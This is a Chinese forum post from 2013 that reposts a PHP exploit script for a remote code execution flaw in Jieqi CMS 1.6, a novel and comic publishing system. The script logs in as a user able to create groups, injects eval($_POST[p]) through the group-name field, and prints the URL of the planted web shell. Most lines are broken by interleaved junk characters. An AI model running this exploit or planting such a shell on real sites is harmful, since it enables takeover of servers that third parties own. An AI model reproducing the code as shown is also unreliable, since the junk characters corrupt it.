杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
8 t# b1 y' G, |
u. `0 H& c' `4 O- E! h 6 M, R6 a Z! o* L1 R/ ~
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。4 Q' d# h _( e" K# x( e. g
需要有一个能创建圈子的用户。( B: ~$ p' W7 U; a+ d Q' O# y/ n+ E$ |
& a" g. C3 @0 m: v<?php! l- A( O* `) J8 R7 k; \
, o. d+ {% q! T; G& hprint_r('% h0 h. i0 E0 v2 a- V, E2 v8 U
+---------------------------------------------------------------------------+. m, y+ B. i e: J8 q+ n; d
Jieqi CMS V1.6 PHP Code Injection Exploit
3 L+ e" g' P+ D2 x/ qby flyh4t( l" A( l+ R9 _3 i9 n2 H
mail: phpsec at hotmail dot com
& ^- U ?3 H) h# hteam: http://www.wolvez.org8 S! a& [' K( u3 v3 X. y# g
+---------------------------------------------------------------------------+
G% L# X* l3 l" L'); /**& i8 _4 v e e+ u. B, e. O
* works regardless of php.ini settings. s) z. V8 S4 Z% A: R! {' L" l
*/ if ($argc < 5) { print_r('3 q- B, A) h/ D) B4 {8 v8 X, o
+---------------------------------------------------------------------------+. v3 T2 S$ I5 i8 v" A2 t. m
Usage: php '.$argv[0].' host path username3 {8 X: L7 r1 H7 E
host: target server (ip/hostname)
1 a2 O& N* Z" w! L$ dpath: path to jieqicms 9 r% ]( {# |; r
uasename: a username who can create group- R5 g: Q0 u' I; O! f2 j# `5 X
Example:, G: z* v( T" s2 E6 N4 f7 N
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
( G4 p' d- Q) `1 c' e+---------------------------------------------------------------------------+
! N: Y# _8 y9 n$ u- o'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961# t, \* p) m4 f
Content-Disposition: form-data; name="gname"4 |6 c" t- J/ G6 Q) B
, i7 v+ W2 F/ L1 @2 F& p4 H
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t" M, c0 B4 @, H5 d. B% L
-----------------------------23281168279961
) T* {7 A" d$ z% J* {9 vContent-Disposition: form-data; name="gcatid"( P8 B1 X7 [; r' f& b- s
9 _6 R! F- |$ Q! K- [5 A5 [( U
1
; r$ }. C( x: g4 a/ ]-----------------------------23281168279961
$ N- R5 x; [' WContent-Disposition: form-data; name="gaudit"2 z( i3 G- m9 J3 P# E% P
. x6 h0 U* k, u5 Z5 W: ?8 } j14 X: L7 B4 P" r$ p
-----------------------------232811682799614 F( J+ C1 h2 W3 s
Content-Disposition: form-data; name="gbrief"
+ K: U! o5 h2 V2 [$ r# o# A* U
6 e( P( s/ Y- s2 \' k1 N" s/ q1# q: I5 G2 U! J* h2 U# c5 C7 Q
-----------------------------23281168279961--! O: ?- P% t, v$ b' U; I; k L
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com" u' f' J2 V6 A; P
% X9 z3 Z! x3 a6 I% R. T
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对